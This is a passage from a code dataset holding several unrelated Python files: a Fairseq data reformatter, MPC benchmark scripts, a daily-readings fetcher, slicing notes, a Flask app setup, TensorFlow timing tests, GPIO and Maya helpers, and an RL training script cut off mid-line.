stored in the directory task0-data/\n\ne.g.\n$ python fairseqFormat.py eng\n\nIt will turn all English train, dev, (test if there is test data) into the format Fairseq requires,\nand store the reformatted data in the current directory.\n'''\nimport sys, os, json\n\ndef reformat(fname, finputname, foutputname):\n with open(fname) as f, \\\n open(finputname, 'w') as finput, \\\n open(foutputname, 'w') as foutput:\n for line in f:\n lines = line.strip().split('\\t')\n lemma = lines[0].strip().replace(' ', '_')\n msd = lines[-1].strip().replace(' ', '_')\n if len(lines) == 3:\n form = lines[1].strip().replace(' ', '_')\n elif len(lines) == 2:\n form = '-'\n else:\n print('Please make sure each line in your file is a tab separated 3-column entry.')\n pos = msd.split(';')[0]\n if '.' in pos:\n pos = pos.split('.')[0]\n #input = [letter for letter in lemma] + [pos, 'CANONICAL'] + ['#'] + [tag for tag in msd.split(';')]\n input = [letter for letter in lemma] + [tag for tag in msd.split(';')]\n output = [letter for letter in form]\n finput.write(' '.join(input) + '\\n')\n foutput.write(' '.join(output) + '\\n')\n\nif __name__ == '__main__':\n\n lang_fam_dict = json.load(open('lang2fam.json'))\n\n lang_dir_dict = json.load(open('lang2dir.json'))\n\n lang = sys.argv[1]\n\n datadir = \"task0-data/\" + lang_dir_dict[lang]\n\n\n train = datadir + lang_fam_dict[lang] + '/' + lang + '.trn'\n trainin = 'train.' + lang + '.input'\n trainout = 'train.' + lang + '.output'\n\n print('training data:', train)\n if os.path.exists(train):\n reformat(train, trainin, trainout)\n\n dev = datadir + lang_fam_dict[lang] + '/' + lang + '.dev'\n devin = 'dev.' + lang + '.input'\n devout = 'dev.' + lang + '.output'\n\n print('dev data:', dev)\n if os.path.exists(dev):\n reformat(dev, devin, devout)\n\n test = datadir + lang_fam_dict[lang] + '/' + lang + '.tst'\n testin = 'test.' + lang + '.input'\n testout = 'test.' 
+ lang + '.output'\n\n print('test data:', test)\n if os.path.exists(test):\n reformat(test, testin, testout)\n\n\n\n","sub_path":"fairseq_format.py","file_name":"fairseq_format.py","file_ext":"py","file_size_in_byte":2330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"52828383","text":"from conclave import CodeGenConfig\nfrom conclave.codegen.sharemind import SharemindCodeGen, SharemindCodeGenConfig\nimport conclave.dispatch\nimport conclave.net\nfrom conclave.comp import dag_only\nimport conclave.lang as sal\nfrom conclave.utils import *\nimport sys\n\n\ndef setup():\n\n # define inputs\n colsIn1 = [\n defCol(\"a\", \"INTEGER\", [1]),\n defCol(\"b\", \"INTEGER\", [1])\n ]\n colsIn2 = [\n defCol(\"a\", \"INTEGER\", [2]),\n defCol(\"b\", \"INTEGER\", [2])\n ]\n colsIn3 = [\n defCol(\"a\", \"INTEGER\", [3]),\n defCol(\"b\", \"INTEGER\", [3])\n ]\n\n in1 = sal.create(\"in1\", colsIn1, set([1]))\n in2 = sal.create(\"in2\", colsIn2, set([2]))\n in3 = sal.create(\"in3\", colsIn3, set([3]))\n\n cl1 = sal._close(in1, \"cl1\", set([1, 2, 3]))\n cl2 = sal._close(in2, \"cl2\", set([1, 2, 3]))\n cl3 = sal._close(in3, \"cl3\", set([1, 2, 3]))\n\n rel = sal.concat([cl1, cl2, cl3], \"rel\")\n\n return set([in1, in2, in3]), rel\n\n\ndef agg(pid, config, sharemind_peer, f_size):\n\n @dag_only\n def protocol():\n\n inputs, rel = setup()\n res = sal.aggregate(rel, \"agg\", [\"a\"], \"b\", \"+\", \"total\")\n\n opened = sal._open(res, \"opened\", 1)\n\n return inputs\n\n cg = SharemindCodeGen(config, protocol(), pid)\n job = cg.generate(\"agg_{}\".format(f_size), \"\")\n job_queue = [job]\n\n conclave.dispatch.dispatch_all(None, sharemind_peer, job_queue)\n\n\ndef col_div(pid, config, sharemind_peer, f_size):\n\n @dag_only\n def protocol():\n\n inputs, rel = setup()\n res = sal.divide(rel, 'div1', 'a', ['a', 'b'])\n\n opened = sal._open(res, \"opened\", 1)\n\n return inputs\n\n cg = SharemindCodeGen(config, protocol(), pid)\n job = cg.generate(\"col_div_{}\".format(f_size), \"\")\n job_queue = [job]\n\n conclave.dispatch.dispatch_all(None, sharemind_peer, job_queue)\n\n\ndef col_mult(pid, config, sharemind_peer, f_size):\n\n @dag_only\n def protocol():\n\n inputs, rel = setup()\n res = sal.multiply(rel, 'mult1', 'a', ['a', 'b'])\n\n opened = sal._open(res, \"opened\", 1)\n\n return inputs\n\n cg = SharemindCodeGen(config, protocol(), pid)\n job = cg.generate(\"col_mult_{}\".format(f_size), \"\")\n job_queue = [job]\n\n conclave.dispatch.dispatch_all(None, sharemind_peer, job_queue)\n\n\ndef scalar_div(pid, config, sharemind_peer, f_size):\n\n @dag_only\n def protocol():\n\n inputs, rel = setup()\n res = sal.divide(rel, 'div1', 'a', ['a', 1])\n\n opened = sal._open(res, \"opened\", 1)\n\n return inputs\n\n cg = SharemindCodeGen(config, protocol(), pid)\n job = cg.generate(\"scalar_div_{}\".format(f_size), \"\")\n job_queue = [job]\n\n conclave.dispatch.dispatch_all(None, sharemind_peer, job_queue)\n\n\ndef scalar_mult(pid, config, sharemind_peer, f_size):\n\n @dag_only\n def protocol():\n\n inputs, rel = setup()\n res = sal.multiply(rel, 'mult1', 'a', ['a', 1])\n\n opened = sal._open(res, \"opened\", 1)\n\n return inputs\n\n cg = SharemindCodeGen(config, protocol(), pid)\n job = cg.generate(\"scalar_mult_{}\".format(f_size), \"\")\n job_queue = [job]\n\n conclave.dispatch.dispatch_all(None, sharemind_peer, job_queue)\n\n\ndef project(pid, config, sharemind_peer, f_size):\n\n @dag_only\n def protocol():\n\n inputs, rel = setup()\n\n cols = [column.name 
for column in rel.out_rel.columns][::-1]\n\n res = sal.project(rel, \"proja\", cols)\n\n opened = sal._open(res, \"opened\", 1)\n return inputs\n\n cg = SharemindCodeGen(config, protocol(), pid)\n job = cg.generate(\"project_{}\".format(f_size), \"\")\n job_queue = [job]\n\n conclave.dispatch.dispatch_all(None, sharemind_peer, job_queue)\n\n\ndef join(pid, config, sharemind_peer, f_size):\n\n @dag_only\n def protocol():\n\n colsIn1 = [\n defCol(\"a\", \"INTEGER\", [1]),\n defCol(\"b\", \"INTEGER\", [1])\n ]\n in1 = sal.create(\"in1\", colsIn1, set([1]))\n colsIn2 = [\n defCol(\"a\", \"INTEGER\", [2]),\n defCol(\"b\", \"INTEGER\", [2])\n ]\n in2 = sal.create(\"in2\", colsIn2, set([2]))\n\n cl1 = sal._close(in1, \"cl1\", set([1, 2, 3]))\n cl2 = sal._close(in2, \"cl2\", set([1, 2, 3]))\n\n res = sal.join(cl1, cl2, \"res\", [\"a\"], [\"a\"])\n\n opened = sal._open(res, \"opened\", 1)\n return set([in1, in2])\n\n cg = SharemindCodeGen(config, protocol(), pid)\n job = cg.generate(\"join_{}\".format(f_size), \"\")\n job_queue = [job]\n\n conclave.dispatch.dispatch_all(None, sharemind_peer, job_queue)\n\n\ndef no_hdfs():\n\n pid = int(sys.argv[1])\n num_tuples = sys.argv[2]\n op = sys.argv[3]\n\n # use if running locally\n #sharemind_config = {\n # \"pid\": pid,\n # \"parties\": {\n # 1: {\"host\": \"localhost\", \"port\": 9001},\n # 2: {\"host\": \"localhost\", \"port\": 9002},\n # 3: {\"host\": \"localhost\", \"port\": 9003}\n # }\n #}\n sharemind_config = {\n \"pid\": pid,\n \"parties\": {\n 1: {\"host\": \"ca-spark-node-0\", \"port\": 9001},\n 2: {\"host\": \"cb-spark-node-0\", \"port\": 9002},\n 3: {\"host\": \"cc-spark-node-0\", \"port\": 9003}\n }\n }\n\n workflow_name = \"{}_{}_{}\".format(op, num_tuples, pid)\n sm_cg_config = SharemindCodeGenConfig(\n workflow_name, \"/mnt/shared\", use_hdfs=False, use_docker=True)\n codegen_config = CodeGenConfig(\n workflow_name).with_sharemind_config(sm_cg_config)\n codegen_config.code_path = \"/mnt/shared/\" + workflow_name\n codegen_config.input_path = \"/mnt/shared\" + \"/\" + num_tuples\n codegen_config.output_path = \"/mnt/shared\" + \"/\" + num_tuples\n\n sm_peer = conclave.net.setup_peer(sharemind_config)\n\n if op == 'agg':\n agg(pid, codegen_config, sm_peer, num_tuples)\n elif op == 'col_div':\n col_div(pid, codegen_config, sm_peer, num_tuples)\n elif op == 'col_mult':\n col_mult(pid, codegen_config, sm_peer, num_tuples)\n elif op == 'scalar_div':\n scalar_div(pid, codegen_config, sm_peer, num_tuples)\n elif op == 'col_mult':\n scalar_mult(pid, codegen_config, sm_peer, num_tuples)\n elif op == 'project':\n project(pid, codegen_config, sm_peer, num_tuples)\n elif op == 'join':\n join(pid, codegen_config, sm_peer, num_tuples)\n else:\n print(\"Unknown:\", op)\n\n\nif __name__ == \"__main__\":\n\n no_hdfs()\n","sub_path":"examples/benchmarks/sharemind/unary_ops.py","file_name":"unary_ops.py","file_ext":"py","file_size_in_byte":6337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"345098406","text":"import datetime\nimport requests\nimport json\nimport sys\nimport pprint\ntoday = datetime.date.today()\napidate = today.strftime('%Y-%m-%d')\nr = requests.get('https://www.ewtn.com/se/readings/readingsservice.svc/day/'+apidate+'/en')\ndata = json.loads(r.text)\n#print(apidate)\n\nd = 0\nref = {}\nwhat = {}\npayload = {}\n\nfor reading in data['ReadingGroups'][0]['Readings']:\n ref[d] = reading['Citations'][0]['Reference']\n what[d] = reading['Type']\n d = d + 1;\n\npayload[\"Language\"] = 
\"en\"\npayload[\"References\"] = ref\nif(len(ref)==3):\n payload = {\"References\":[ref[2]],\"Language\":\"en\"};\nelse:\n payload = {\"References\":[ref[3]],\"Language\":\"en\"};\nheaders = {\"Referer\":\"https://www.ewtn.com/daily-readings/\",\"content-type\":\"application/json\"}\nr = requests.post(\"https://www.ewtn.com/se/readings/readingsservice.svc/books\", data=json.dumps(payload), headers=headers)\nverses = json.loads(r.text)\nprint(verses[0]['Reference'])\ndef prettyreadings(readings_input):\n r = 0\n for i in range(0,len(readings_input)):\n print(verses[0]['Chapters'][0]['Verses'][r]['Number'], end=\". \")\n print(verses[0]['Chapters'][0]['Verses'][r]['Text'], end=\"\")\n r = r+1\nprettyreadings(verses[0]['Chapters'][0]['Verses'])\n\n\n#pprint.pprint(verses)\nsys.stdout.flush()\n\n##{'Color': 'Violet',\n##'Date': '2018-02-26',\n##'Note': 'Total Consecration- Day 7',\n##'ReadingGroups': [{'Name': 'Default', 'Note': None,\n##\t'Readings': [{\n##\t\t'Citations':\n##\t\t[{'Note': None, 'Reference': 'Daniel 9:4-10'}],\n##\t\t\t'Type': 'Reading 1'},\n##\t\t\t{'Citations':\n##\t\t\t\t[{'Note': None, 'Reference': 'Psalms 79:8-9, 11, 13'}],\n##\t\t\t'Type': 'Psalm'},\n##\t\t\t{'Citations': [{'Note': None, 'Reference': 'Luke 6:36-38'}],\n##\t\t\t'Type': 'Gospel'}]}],\n##\t\t\t'Title': 'Lenten Weekday'}\n\n#[{\"Chapters\":\n#\t[{\"Number\":20,\n#\t\t\"Verses\":[{\"Number\":17,\n#\t\t\t\t\t\"Text\":\"And as Jesus was going up to Jerusalem, he took the twelve disciples aside, and on the way he said to them, \"},\n#\t\t\t\t{\"Number\":18,\n#\t\t\t\t\t\"Text\":\"\\\"Behold, we are going up to Jerusalem; and the Son of man will be delivered to the chief priests and scribes, and they will condemn him to death, \"},\n#\t\t\t\t{\"Number\":19,\n#\t\t\t\t\t\"Text\":\"and deliver him to the Gentiles to be mocked and scourged and crucified, and he will be raised on the third day.\\\" \"},\n#\t\t\t\t{\"Number\":20,\n#\t\t\t\t\t\"Text\":\"Then the mother of the sons of Zeb'edee came up to him, with her sons, and kneeling before him she asked him for something. \"},\n#\t\t\t\t{\"Number\":21,\n#\t\t\t\t\t\"Text\":\"And he said to her, \\\"What do you want?\\\" She said to him, \\\"Command that these two sons of mine may sit, one at your right hand and one at your left, in your kingdom.\\\" \"},\n#\t\t\t\t{\"Number\":22,\n#\t\t\t\t\t\"Text\":\"But Jesus answered, \\\"You do not know what you are asking. Are you able to drink the cup that I am to drink?\\\" They said to him, \\\"We are able.\\\" \"},\n#\t\t\t\t{\"Number\":23,\n#\t\t\t\t\t\"Text\":\"He said to them, \\\"You will drink my cup, but to sit at my right hand and at my left is not mine to grant, but it is for those for whom it has been prepared by my Father.\\\" \"},\n#\t\t\t\t{\"Number\":24,\n#\t\t\t\t\t\"Text\":\"And when the ten heard it, they were indignant at the two brothers. \"},\n#\t\t\t\t{\"Number\":25,\n#\t\t\t\t\t\"Text\":\"But Jesus called them to him and said, \\\"You know that the rulers of the Gentiles lord it over them, and their great men exercise authority over them. 
\"},\n#\t\t\t\t{\"Number\":26,\n#\t\t\t\t\t\"Text\":\"It shall not be so among you; but whoever would be great among you must be your servant, \"},\n#\t\t\t\t{\"Number\":27,\n#\t\t\t\t\t\"Text\":\"and whoever would be first among you must be your slave; \"},\n#\t\t\t\t{\"Number\":28,\n#\t\t\t\t\t\"Text\":\"even as the Son of man came not to be served but to serve, and to give his life as a ransom for many.\\\" \"}\n#\t\t\t\t]\n#\t\t\t}\n#\t\t],\n#\"Name\":\"Matthew\",\"Reference\":\"Matthew 20:17-28\",\"Verses\":\"20:17-28\"}]\n","sub_path":"prettyreadings2.py","file_name":"prettyreadings2.py","file_ext":"py","file_size_in_byte":3790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"233089062","text":"# Why slices exclude last item\n# - Easy to see length of a list/ slice/ range when stop is given\n# - Easy to compute length of a list/ slice/ range when start & stop is given\n# - Easy to split a sequence into 2 parts without overlapping\nx = [2, 3, 4, 5]\nx[:2] # >>> [2, 3]\nx[2:] # >>> [4, 5]\n\n# Slicing sequences with a step\n\n# S[start: stop: step]\nls = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\neven_numbers = ls[1:-1:2]\n\n# The step can also be negative, returning elements in reverse\nls[::-1] # reverses the list\n\n\ninvoice = \"\"\"\n0.....6.................................40........52...55........\n1909 Pimoroni PiBrella $17.50 3 $52.50\n1489 6mm Tactile Switch x20 $4.95 2 $9.90\n1510 Panavise Jr. - PV-201 $28.00 1 $28.00\n1601 PiTFT Mini Kit 320x240 $34.95 1 $34.95\n\"\"\"\n\nSKU = slice(0, 6)\nDESCRIPTION = slice(6, 40)\nUNIT_PRICE = slice(40, 52)\nQUANTITY = slice(52, 55)\nITEM_TOTAL = slice(55, None)\nline_items = invoice.split('\\n')[2:]\n\nfor item in line_items:\n print(item[UNIT_PRICE], item[DESCRIPTION])\n\n# A list with lists of length 3\n# Example 2.12\n# Method 1\nboard = [['_'] * 3 for i in range(3)]\nboard[1][2] = 'X' # Only changes element on row 1, column 2\n# Method 2\nboard = []\n\nfor i in range(3):\n row = ['_'] * 3\n board.append(row)\n\n# Example 2.13\nweird_board = [['_'] * 3] * 3\n\nweird_board[1][2] = '0' # Assigns element[2] on every list\n# It appends the same row over and over\n\n# Method 2\nweird_board = []\nrow = ['_'] * 3\nfor i in range(3):\n weird_board.append(ls)\n\n# Augmented assignment: using '*=' or '+='\n# When using a mutable sequence, the original object's location in memory doesn't usually change\nl = ['a','b', 'c']\nid(l) #4508308104\nl *= 3\n#l #['a', 'b', 'c', 'a', 'b', 'c', 'a', 'b', 'c']\nid(l) # 4508308104\n\n# When using an immutable sequence, the original object's location in memory doesn't usually change\nt = ('a', 'b', 'c')\nid(t) #4509354456\nt *=3\n# t # ('a', 'b', 'c', 'a', 'b', 'c', 'a', 'b', 'c')\nid(t) #4508025504\n","sub_path":"chapter_two/tuple_slicing.py","file_name":"tuple_slicing.py","file_ext":"py","file_size_in_byte":1948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"496074689","text":"\"\"\"\napp/__init__.py\n\ninitialise flask app object\n\"\"\"\nimport os\n\nfrom flasgger import Swagger\nfrom flask import Flask, Blueprint\n\nfrom app.api import (\n PathParameterExampleApi,\n JsonPayloadExampleApi,\n QueryParameterExampleApi,\n MultiParameterLocationExampleApi,\n UpdateStockLevelApi,\n GetStockLevelReportApi,\n) # Import defined endpoints created using SwaggerView class\nfrom app.errors import (\n errors,\n) # import blueprint containing error handler for application\n\n\ndef _register_endpoints(app: Flask):\n 
\"\"\"\n Register all endpoints for this application\n\n Register the endpoints in __init__ to avoid circular references\n \"\"\"\n api_v1 = Blueprint('api_v1', __name__, url_prefix='/api/v1')\n\n # Define routes for stock level endpoints\n api_v1.add_url_rule(\n \"/stocklevel\",\n view_func=UpdateStockLevelApi.as_view(\"UpdateStockLevelApi\"),\n methods=[\"POST\"],\n )\n #############################################\n # Exercise 4: Add GetStockLevelReportApi endpoint ROUTE here\n #############################################\n api_v1.add_url_rule(\n \"/stocklevel\",\n view_func=GetStockLevelReportApi.as_view(\"GetStockLevelReportApi\"),\n methods=[\"GET\"],\n )\n\n\n\n\n # Define routes for example endpoints\n api_v1.add_url_rule(\n \"/address/\",\n view_func=PathParameterExampleApi.as_view(\"PathParameterExampleApi\"),\n methods=[\"GET\"],\n )\n api_v1.add_url_rule(\n \"/user/add\",\n view_func=JsonPayloadExampleApi.as_view(\"JsonPayloadExampleApi\"),\n methods=[\"POST\"],\n )\n api_v1.add_url_rule(\n \"/colour/guess\",\n view_func=QueryParameterExampleApi.as_view(\"QueryParameterExampleApi\"),\n methods=[\"GET\"],\n )\n api_v1.add_url_rule(\n \"/colour/user\",\n view_func=MultiParameterLocationExampleApi.as_view(\n \"MultiParameterLocationExampleApi\"\n ),\n methods=[\"POST\"],\n )\n\n # Register api_v1 blueprint\n app.register_blueprint(api_v1)\n\ndef _initialize_errorhandlers(app: Flask):\n \"\"\"\n Initialize error handlers\n\n Use a blueprint so that you can define application error handlers without circular references\n \"\"\"\n # register error handler blueprint\n app.register_blueprint(errors)\n\n\ndef create_app() -> Flask:\n \"\"\"\n Create an app by initializing components.\n\n args:\n None\n\n returns:\n app (Flask): Flask app object\n \"\"\"\n\n # Create Flask App object\n app = Flask(__name__) # pylint: disable = invalid-name\n\n # Get Flask App config based on environment variable\n config_env = \"config.{}Config\".format(\n os.getenv(\"ENV\", \"Dev\")\n ) # config object as defined in config.py\n app.config.from_object(config_env) # Set to chosen configs\n\n # Swagger Documentation Settings, enable autodocumentation of your APIs\n # produces swagger api webpage under {app_url}/swagger, locally: http://0.0.0.0:5000/swagger (urls can be configured on settings see: https://github.com/flasgger/flasgger\n # full json spec found under {app_url}/apispec_1.json, locally: http://0.0.0.0:5000/apispec_1.json\n swagger = Swagger(app) # pylint: disable = unused-variable\n\n # Add endpoints to application object\n _register_endpoints(app)\n\n # initialise error handlers\n _initialize_errorhandlers(app)\n\n return app\n","sub_path":"flask-app/app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"128110247","text":"from tf_cnn_siamese.model import *\nimport tf_cnn_siamese.data_preparation as dp\nimport time\nimport sys\n\n\ndef naive_predict(x1, x2, path):\n \"\"\"\n runs the full model (feature extraction and difference metric)\n :param x1: image 1\n :param x2: image 2\n :param path: file path for checkpoint\n :return:\n \"\"\"\n tf.reset_default_graph()\n conv_weights, conv_biases, fc_weights, fc_biases = initialize_weights()\n saver = tf.train.Saver()\n feed_1, feed_2 = dp.predict_inputs_placeholders()\n out_node = construct_full_model(feed_1, feed_2, conv_weights, conv_biases, fc_weights, fc_biases)\n with tf.Session() as sess: # automatic tear down 
of controlled execution\n    print(\"\\n\")\n    tf.global_variables_initializer().run()\n    print(\"Data Format \" + conf.DATA_FORMAT)\n    cuda_enabled = ('NCHW' == conf.DATA_FORMAT)\n    print(\"CUDA Enabled: \" + str(cuda_enabled))\n    saver.restore(sess, path)\n    feed_dict = {feed_1: x1, feed_2:x2}\n    out = sess.run(out_node, feed_dict)\n  return out\n\n\ndef extract_features(x1, x2, path):\n  \"\"\"\n  extracts two sets of features from two images\n  :param x1: image 1\n  :param x2: image 2\n  :param path: file path for checkpoint\n  :return: feature sets for both\n  \"\"\"\n  tf.reset_default_graph()\n  conv_weights, conv_biases, fc_weights, fc_biases = initialize_weights()\n  saver = tf.train.Saver()\n  feed_1, feed_2 = dp.predict_inputs_placeholders()\n  features_1_node = construct_cnn(feed_1, conv_weights, conv_biases, fc_weights, fc_biases)\n  features_2_node = construct_cnn(feed_2, conv_weights, conv_biases, fc_weights, fc_biases)\n  with tf.Session() as sess: # automatic tear down of controlled execution\n    print(\"\\n\")\n    tf.global_variables_initializer().run()\n    print(\"Data Format \" + conf.DATA_FORMAT)\n    cuda_enabled = ('NCHW' == conf.DATA_FORMAT)\n    print(\"CUDA Enabled: \" + str(cuda_enabled))\n    saver.restore(sess, path)\n    feed_dict_1 = {feed_1: x1}\n    feed_dict_2 = {feed_2: x2}\n    out_1 = sess.run(features_1_node, feed_dict_1)\n    out_2 = sess.run(features_2_node, feed_dict_2)\n  return out_1, out_2\n\n\ndef predict_with_features(features_1, features_2, path):\n  \"\"\"\n  gets model prediction using extracted features\n  :param features_1: features from first image\n  :param features_2: features from second image\n  :param path: file path for checkpoint\n  :return: probability of positive\n  \"\"\"\n  tf.reset_default_graph()\n  _, _, fc_weights, fc_biases = initialize_weights()\n  saver = tf.train.Saver()\n  feed_1, feed_2 = dp.predict_features_placeholders()\n  predict_node = construct_joined_model(feed_1, feed_2, fc_weights, fc_biases)\n  with tf.Session() as sess: # automatic tear down of controlled execution\n    print(\"\\n\")\n    tf.global_variables_initializer().run()\n    print(\"Data Format \" + conf.DATA_FORMAT)\n    cuda_enabled = ('NCHW' == conf.DATA_FORMAT)\n    print(\"CUDA Enabled: \" + str(cuda_enabled))\n    saver.restore(sess, path)\n    feed_dict = {feed_1: features_1, feed_2: features_2}\n    out = sess.run(predict_node, feed_dict)\n  return out\n\n\ndef test_model_prediction():\n  path = input(\"enter path:\")\n  tset1, tset2, ty, _, _, _ = dp.get_mnist_dataset()\n  x1 = tset1[0:1]\n  x2 = tset2[0:1]\n  y = ty[0]\n  naive = naive_predict(x1, x2, path)\n  features_1, features_2 = extract_features(x1, x2, path)\n  streamlined = predict_with_features(features_1, features_2, path)\n  print(\"Actual: \" + str(y))\n  print(\"Naive: \" + str(naive))\n  print(\"Streamlined: \" + str(streamlined))\n\n\ndef time_cnn_feature_extraction():\n  \"\"\"\n  tests the running time of one twin network doing feature extraction\n  :return: None\n  \"\"\"\n  tf.reset_default_graph()\n  tset1, tset2, ty, vset1, vset2, vy = dp.get_mnist_dataset()\n  conv_weights, conv_biases, fc_weights, fc_biases = initialize_weights()\n  # creates saver\n  saver = tf.train.Saver()\n  feed_1, feed_2, labels = dp.test_inputs_placeholders()\n  cnn = construct_cnn(feed_1, conv_weights, conv_biases, fc_weights, fc_biases)\n  with tf.Session() as sess: # automatic tear down of controlled execution\n    print(\"\\n\")\n    tf.global_variables_initializer().run()\n    print(\"Data Format \" + conf.DATA_FORMAT)\n    cuda_enabled = ('NCHW' == conf.DATA_FORMAT)\n    print(\"CUDA Enabled: \" + 
str(cuda_enabled))\n    if input(\"resume from previous session (y/n):\") == \"y\":\n      path = input(\"enter path:\")\n      saver.restore(sess, path)\n    start_time = time.time()\n    # iterates through the training data in batches\n    data_size = tset1.shape[0]\n    total = data_size\n    num_steps = total // conf.TEST_BATCH_SIZE\n    for step in range(num_steps):\n      # offset of the current minibatch\n      offset = (step * conf.TEST_BATCH_SIZE) % (data_size - conf.TEST_BATCH_SIZE)\n      batch_x1 = tset1[offset:(offset + conf.TEST_BATCH_SIZE), ...]\n      # maps batched input to graph data nodes\n      feed_dict = {feed_1: batch_x1}\n      # runs the network every iteration\n      sess.run(cnn, feed_dict=feed_dict)\n    # reports the total elapsed time once all batches have run\n    elapsed_time = time.time() - start_time\n    print('\\n%.4f s' % elapsed_time)\n    print(\"Size: \" + str(ty.shape[0]))\n    expected = elapsed_time * 137374 / ty.shape[0]\n    print(\"Expected Feature Extraction Time for 137,374 Unicode: \" + str(expected))\n    sys.stdout.flush()\n\n\ndef time_joined_difference():\n  \"\"\"\n  tests the running time of the joined network running on extracted features\n  :return: None\n  \"\"\"\n  tf.reset_default_graph()\n  num_pairs = 100000\n  features_1, features_2 = dp.generate_features(num_pairs)\n  _, _, fc_weights, fc_biases = initialize_weights()\n  feed_1, feed_2 = dp.test_features_placeholders()\n  # creates saver\n  saver = tf.train.Saver()\n  out = construct_joined_model(feed_1, feed_2, fc_weights, fc_biases)\n  with tf.Session() as sess: # automatic tear down of controlled execution\n    print(\"\\n\")\n    tf.global_variables_initializer().run()\n    print(\"Data Format \" + conf.DATA_FORMAT)\n    cuda_enabled = ('NCHW' == conf.DATA_FORMAT)\n    print(\"CUDA Enabled: \" + str(cuda_enabled))\n    if input(\"resume from previous session (y/n):\") == \"y\":\n      path = input(\"enter path:\")\n      saver.restore(sess, path)\n    start_time = time.time()\n    # iterates through the training data in batches\n    total = num_pairs\n    num_steps = total // conf.TEST_BATCH_SIZE\n    for step in range(num_steps):\n      # offset of the current minibatch\n      offset = (step * conf.TEST_BATCH_SIZE) % (num_pairs - conf.TEST_BATCH_SIZE)\n      batch_x1 = features_1[offset:(offset + conf.TEST_BATCH_SIZE), ...]\n      batch_x2 = features_2[offset:(offset + conf.TEST_BATCH_SIZE), ...]\n      # maps batched input to graph data nodes\n      feed_dict = {feed_1: batch_x1, feed_2: batch_x2}\n      # runs the network every iteration\n      sess.run(out, feed_dict=feed_dict)\n    # reports the total elapsed time once all batches have run\n    elapsed_time = time.time() - start_time\n    print('\\n%.4f s' % elapsed_time)\n    print(\"Size: \" + str(num_pairs))\n    expected = elapsed_time * 9435739251 / num_pairs\n    print(\"Expected Feature Extraction Time for 10B Pairs: \" + str(expected))\n    sys.stdout.flush()\n\n\nif __name__ == \"__main__\":\n  test_model_prediction()\n","sub_path":"tf_cnn_siamese/deployment_tests.py","file_name":"deployment_tests.py","file_ext":"py","file_size_in_byte":7148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"598799998","text":"import RPi.GPIO as GPIO\n\nGPIO.setwarnings(False)\nGPIO.setmode(GPIO.BCM)\n\nGPIO.setup(17, GPIO.IN)\nGPIO.setup(18, GPIO.IN)\nGPIO.setup(20, GPIO.OUT)\nGPIO.setup(21, GPIO.OUT)\n\n \n\ndef f_input(**input):\n    for name, value in input.items():\n        print(\"%s = %d\" %(name, value))\n##        print(\"{} = {}\" .format(name, value))\n    \n\nwhile True:\n    \n    #\n    X1 = GPIO.input(17)\n    X2 = GPIO.input(18)\n    \n    A = {\"R_DIO_X1\" : X1, \"R_DIO_X2\" 
: X1, \"R_DIO_X3\" : X2, \"R_DIO_X4\" : X2}\n f_input(**A)\n \n\n\n\n","sub_path":"Source code/Python/che_func_kwarg.py","file_name":"che_func_kwarg.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"606960937","text":"import maya.cmds as cmds\ndef createShape(prefix='', scale=1.0):\n \n List = []\n List.append(cmds.curve(n=prefix, p=[(-1.0, 0.0, 0.0), (-1.0, 0.0, 2.0), (1.0, 0.0, 2.0), (1.0, 0.0, 0.0), (2.0, 0.0, 0.0), (0.0, 0.0, -2.0), (-2.0, 0.0, 0.0), (-1.0, 0.0, 0.0)],per = False, d=1, k=[0, 1, 2, 3, 4, 5, 6, 7]))\n for x in range(len(List)-1):\n cmds.makeIdentity(List[x+1], apply=True, t=1, r=1, s=1, n=0)\n shapeNode = cmds.ListRelatives(List[x+1], shapes=True)\n cmds.parent(shapeNode, List[0], add=True, s=True)\n cmds.delete(List[x+1])\n\n sel = List[0]\n\n cmds.setAttr(sel + '.s', scale, scale, scale)\n\n cmds.makeIdentity(sel, apply=1, t=1, r=1, s=1, n=0)\n\n return sel\n\n","sub_path":"CustomProceduralRiggingTool/CustomProceduralRigTool/rigLib/base/controlShape/ArrowCurve.py","file_name":"ArrowCurve.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"186370080","text":"\"\"\"\nTrain an agent to solve the Quanser Qube environment using Episodic Measure-Valued Derivatives.\n\"\"\"\nfrom pyrado.algorithms.emvd import EMVD\nfrom pyrado.algorithms.torchdistributions import GaussianDiagonalLogStdParametrization, GaussianDiagonal\nfrom pyrado.environment_wrappers.action_normalization import ActNormWrapper\nfrom pyrado.environments.pysim.quanser_qube import QQubeSim\nfrom pyrado.logger.experiment import setup_experiment, save_list_of_dicts_to_yaml\nfrom pyrado.policies.environment_specific import QQubeSwingUpAndBalanceCtrl\nfrom pyrado.policies.features import FeatureStack, identity_feat, sign_feat, abs_feat, squared_feat, qubic_feat, \\\n bell_feat, RandFourierFeat, MultFeat\nfrom pyrado.policies.linear import LinearPolicy\nimport torch as to\nimport numpy as np\n\n\nif __name__ == '__main__':\n # Experiment (set seed before creating the modules)\n # ex_dir = setup_experiment(QQubeSim.name, PoWER.name, f'{LinearPolicy}_actnorm', seed=1)\n ex_dir = setup_experiment(QQubeSim.name + 'swing', EMVD.name, QQubeSwingUpAndBalanceCtrl.name, seed=2)\n\n # Environment\n env_hparams = dict(dt=1/500., max_steps=5000)\n env = QQubeSim(**env_hparams)\n # env = ActNormWrapper(env)\n\n # Search distribution\n # init_loc = np.array([np.log(0.02), np.log(50.), 0.3],\n # dtype=np.float64)\n # init_std = 1.0 * np.ones(init_loc.shape[0], dtype=np.float64)\n\n init_loc = np.array([np.exp(-2.6142373),\n np.exp(2.6333313),\n 0.3],\n dtype=np.float64)\n init_std = 0.5 * np.ones(init_loc.shape[0], 